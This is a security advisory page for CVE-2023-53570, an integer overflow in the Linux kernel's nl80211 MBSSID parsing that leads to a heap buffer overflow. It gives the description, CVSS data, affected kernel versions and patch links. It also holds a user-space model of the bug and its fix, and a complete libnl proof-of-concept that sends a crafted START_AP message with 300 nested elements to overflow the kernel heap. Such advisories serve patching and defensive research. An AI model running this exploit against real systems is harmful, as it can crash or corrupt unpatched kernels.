Security Vulnerability Report
CVE-2023-53570 CVSS 7.8 HIGH

Published: 2025-10-04 16:15:53
Last Modified: 2026-03-21 00:44:16
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

wifi: nl80211: fix integer overflow in nl80211_parse_mbssid_elems()

nl80211_parse_mbssid_elems() uses a u8 variable num_elems to count the number of MBSSID elements in the nested netlink attribute attrs, which can lead to an integer overflow if a user of the nl80211 interface specifies 256 or more elements in the corresponding attribute in userspace. The integer overflow can lead to a heap buffer overflow as num_elems determines the size of the trailing array in elems, and this array is thereafter written to for each element in attrs.

Note that this vulnerability only affects devices with the wiphy->mbssid_max_interfaces member set for the wireless physical device struct in the device driver, and can only be triggered by a process with CAP_NET_ADMIN capabilities.

Fix this by checking for a maximum of 255 elements in attrs.
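
The two passes the description refers to, modelled in user space as an added example (this is not the kernel's code and not part of this report): a walker over netlink nested attributes with the kernel's nla_ok()/nla_next() bounds checks, the pre-fix counting loop with its u8 num_elems, the patched loop that rejects a 256th element with -EINVAL, and a dry run of the second pass that reports how many stores would land past a kzalloc() sized from the wrapped counter. The struct nla_hdr, build_nested(), next_nested(), count_elems_vulnerable(), count_elems_fixed(), overflow_writes() and run_case() names are this example's own, the nested attributes are constructed inside the block, and the example also covers the 255-element case that both versions accept.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Netlink attribute header, same layout as struct nlattr in <linux/netlink.h>:
 * total length including header, then type. Declared locally (name assumed)
 * so the example builds without kernel headers. */
struct nla_hdr { uint16_t nla_len; uint16_t nla_type; };
#define ATTR_ALIGN(n) (((n) + 3) & ~3)
#define ATTR_HDRLEN   ((int)ATTR_ALIGN(sizeof(struct nla_hdr)))

/* Constructed input: n child attributes of `payload` bytes each, the way a
 * userspace nl80211 client fills NL80211_ATTR_MBSSID_ELEMS. Returns bytes written. */
size_t build_nested(uint8_t *buf, size_t cap, unsigned n, uint16_t payload)
{
    size_t off = 0, need = ATTR_ALIGN(ATTR_HDRLEN + payload);
    for (unsigned i = 0; i < n; i++) {
        struct nla_hdr h = { (uint16_t)(ATTR_HDRLEN + payload), (uint16_t)(i + 1) };
        if (off + need > cap)
            return 0;
        memcpy(buf + off, &h, sizeof h);
        memset(buf + off + ATTR_HDRLEN, 0xAA, payload);
        off += need;
    }
    return off;
}

/* One step of nla_for_each_nested() with the kernel's nla_ok()/nla_next()
 * checks: returns 1 and the header, or 0 at the end or on a truncated attribute. */
int next_nested(const uint8_t *attrs, int *rem, size_t *off, struct nla_hdr *out)
{
    if (*rem < ATTR_HDRLEN)
        return 0;
    memcpy(out, attrs + *off, sizeof *out);
    if (out->nla_len < ATTR_HDRLEN || out->nla_len > *rem)
        return 0;
    *rem -= ATTR_ALIGN(out->nla_len);
    *off += ATTR_ALIGN(out->nla_len);
    return 1;
}

/* Pre-fix first pass: a u8 counter, so the 256th element wraps it to 0
 * (CWE-190) and 300 elements count as 44. */
uint8_t count_elems_vulnerable(const uint8_t *attrs, int len)
{
    uint8_t num_elems = 0;
    struct nla_hdr h; size_t off = 0; int rem = len;
    while (next_nested(attrs, &rem, &off, &h))
        num_elems++;
    return num_elems;
}

/* Fixed first pass: refuse a 256th element with -EINVAL before the counter
 * can wrap, so the allocation always matches the second pass. */
int count_elems_fixed(const uint8_t *attrs, int len)
{
    uint8_t num_elems = 0;
    struct nla_hdr h; size_t off = 0; int rem = len;
    while (next_nested(attrs, &rem, &off, &h)) {
        if (num_elems >= 255)
            return -EINVAL;
        num_elems++;
    }
    return num_elems;
}

/* Dry run of the unpatched second pass: kzalloc() gets num_elems slots, then one
 * entry is stored per nested attribute. Returns how many stores would land past
 * the allocation; nothing is actually written out of bounds here. */
unsigned overflow_writes(const uint8_t *attrs, int len)
{
    unsigned slots = count_elems_vulnerable(attrs, len), writes = 0;
    struct nla_hdr h; size_t off = 0; int rem = len;
    while (next_nested(attrs, &rem, &off, &h))
        writes++;
    return writes > slots ? writes - slots : 0;
}

struct case_result { uint8_t vuln_count; int fixed_count; unsigned overflow; };

/* Build n one-byte elements in a scratch buffer and run both versions on them. */
struct case_result run_case(unsigned n)
{
    static uint8_t buf[8192];
    int len = (int)build_nested(buf, sizeof buf, n, 1);
    struct case_result r = { count_elems_vulnerable(buf, len),
                             count_elems_fixed(buf, len), overflow_writes(buf, len) };
    return r;
}

int main(void)
{
    unsigned cases[] = { 255, 256, 300 };
    for (size_t i = 0; i < 3; i++) {
        struct case_result r = run_case(cases[i]);
        printf("%3u elements: u8 count=%3u  patched=%s  oob stores=%u\n", cases[i],
               r.vuln_count, r.fixed_count < 0 ? "-EINVAL" : "accepted", r.overflow);
    }
    return 0;
}
```

Any C99 compiler builds it. With 256 elements the u8 counter reads 0, so the unpatched kernel would size the allocation for zero entries and then store 256 of them; with 300 it reads 44 and 256 stores still land past the end. The patched loop returns -EINVAL in both cases and accepts 255.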

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-190 (Integer Overflow or Wraparound)

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 5.16, before 6.1.46)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 6.2, before 6.4.11)
cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:* - VULNERABLE
Linux Kernel 5.16 through 6.1.45 (affected; the 6.1.x LTS series is fixed in 6.1.46)
Linux Kernel 6.2 through 6.4.10 (affected; fixed in 6.4.11)
Linux Kernel 6.5-rc1 through 6.5-rc5 (affected)
The NVD configuration data lists no affected version before 5.16 (so the 5.15.x and 5.10.x LTS series fall outside the range) and none after 6.5-rc5.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/* CVE-2023-53570 PoC - Linux kernel nl80211 integer overflow
 *
 * Sends NL80211_CMD_START_AP with an NL80211_ATTR_MBSSID_ELEMS attribute that
 * nests 300 (>= 256) elements, so the u8 element counter in
 * nl80211_parse_mbssid_elems() wraps: the kernel kzalloc()s fewer slots than
 * it then fills, a heap buffer overflow.
 *
 * Requirements: CAP_NET_ADMIN (the kernel answers -EPERM without it), an
 * interface already in AP mode and up (e.g. iw dev <if> set type __ap &&
 * ip link set <if> up), and a driver that sets wiphy->mbssid_max_interfaces;
 * on a wiphy without MBSSID support the parser returns -EINVAL before it
 * reaches the overflow. A patched kernel rejects the 256th element with -EINVAL.
 * Compile: gcc -o poc poc.c $(pkg-config --cflags --libs libnl-genl-3.0)
 * Usage:   ./poc <ap-interface>
 */
#include <stdio.h>
#include <stdint.h>
#include <net/if.h>
#include <linux/nl80211.h>
#include <netlink/netlink.h>
#include <netlink/genl/genl.h>
#include <netlink/genl/ctrl.h>

#define NUM_MBSSID_ELEMENTS 300 /* >= 256 wraps the u8 counter (300 -> 44) */

int main(int argc, char *argv[])
{
    struct nl_sock *sk;
    struct nl_msg *msg;
    struct nlattr *mbssid;
    unsigned int ifindex;
    int err, family;
    /* Smallest beacon head the kernel's beacon-head validation accepts: a
     * 36-byte beacon management frame (frame control 0x0080) with no IEs. */
    uint8_t beacon_head[36] = { 0x80, 0x00 };

    if (argc != 2) {
        fprintf(stderr, "usage: %s <ap-interface>\n", argv[0]);
        return 1;
    }
    ifindex = if_nametoindex(argv[1]);
    if (!ifindex) {
        perror("if_nametoindex");
        return 1;
    }

    sk = nl_socket_alloc();
    if (!sk) {
        fprintf(stderr, "Failed to allocate netlink socket\n");
        return 1;
    }
    /* Connect to generic netlink and look up the nl80211 family id */
    if (genl_connect(sk) < 0) {
        fprintf(stderr, "Failed to connect to generic netlink\n");
        nl_socket_free(sk);
        return 1;
    }
    family = genl_ctrl_resolve(sk, "nl80211");
    if (family < 0) {
        fprintf(stderr, "Failed to resolve nl80211 family\n");
        nl_socket_free(sk);
        return 1;
    }

    /* nlmsg_alloc() defaults to one page; ask for more so 300 nested
     * attributes plus the beacon head always fit */
    msg = nlmsg_alloc_size(16384);
    if (!msg) {
        nl_socket_free(sk);
        return 1;
    }
    if (!genlmsg_put(msg, NL_AUTO_PORT, NL_AUTO_SEQ, family, 0, 0,
                     NL80211_CMD_START_AP, 0))
        goto nla_put_failure;

    /* Attributes START_AP requires before it parses the beacon */
    NLA_PUT_U32(msg, NL80211_ATTR_IFINDEX, ifindex);
    NLA_PUT_U32(msg, NL80211_ATTR_BEACON_INTERVAL, 100);
    NLA_PUT_U32(msg, NL80211_ATTR_DTIM_PERIOD, 2);
    NLA_PUT(msg, NL80211_ATTR_BEACON_HEAD, sizeof(beacon_head), beacon_head);

    /* Nested MBSSID elements: the kernel's first pass counts them in a u8,
     * allocates that many slots, then its second pass stores all 300 */
    mbssid = nla_nest_start(msg, NL80211_ATTR_MBSSID_ELEMS);
    if (!mbssid)
        goto nla_put_failure;
    for (int i = 0; i < NUM_MBSSID_ELEMENTS; i++)
        NLA_PUT(msg, i + 1, 8, "AAAAAAA");
    nla_nest_end(msg, mbssid);

    /* Send and wait for the kernel's ACK; nl_send_sync() frees msg */
    err = nl_send_sync(sk, msg);
    if (err < 0)
        fprintf(stderr, "Failed to send message: %s (%d)\n", nl_geterror(err), err);
    else
        printf("PoC sent successfully. Check kernel for crash/overflow.\n");
    nl_socket_free(sk);
    return err < 0;

nla_put_failure:
    fprintf(stderr, "Failed to build netlink message\n");
    nlmsg_free(msg);
    nl_socket_free(sk);
    return 1;
}

References

https://git.kernel.org/stable/c/6311071a056272e1e761de8d0305e87cc566f734 (Patch)
https://git.kernel.org/stable/c/7d09f9f255a5f78578deba5454923072bb53b16c (Patch)
https://git.kernel.org/stable/c/e642eb67b8c10dcce758d549cc81564116e0fa49 (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53570", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:52.577", "lastModified": "2026-03-21T00:44:15.837", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: nl80211: fix integer overflow in nl80211_parse_mbssid_elems()\n\nnl80211_parse_mbssid_elems() uses a u8 variable num_elems to count the\nnumber of MBSSID elements in the nested netlink attribute attrs, which can\nlead to an integer overflow if a user of the nl80211 interface specifies\n256 or more elements in the corresponding attribute in userspace. The\ninteger overflow can lead to a heap buffer overflow as num_elems determines\nthe size of the trailing array in elems, and this array is thereafter\nwritten to for each element in attrs.\n\nNote that this vulnerability only affects devices with the\nwiphy->mbssid_max_interfaces member set for the wireless physical device\nstruct in the device driver, and can only be triggered by a process with\nCAP_NET_ADMIN capabilities.\n\nFix this by checking for a maximum of 255 elements in attrs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", 
"versionEndExcluding": "6.1.46", "matchCriteriaId": "D8B8CC90-9492-465C-81D4-10DA3B712286"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.11", "matchCriteriaId": "C36FD9E6-B6D7-4887-8F08-C1F64E139D5C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:*", "matchCriteriaId": "6F15C659-DF06-455A-9765-0E6DE920F29A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/6311071a056272e1e761de8d0305e87cc566f734", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7d09f9f255a5f78578deba5454923072bb53b16c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e642eb67b8c10dcce758d549cc81564116e0fa49", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}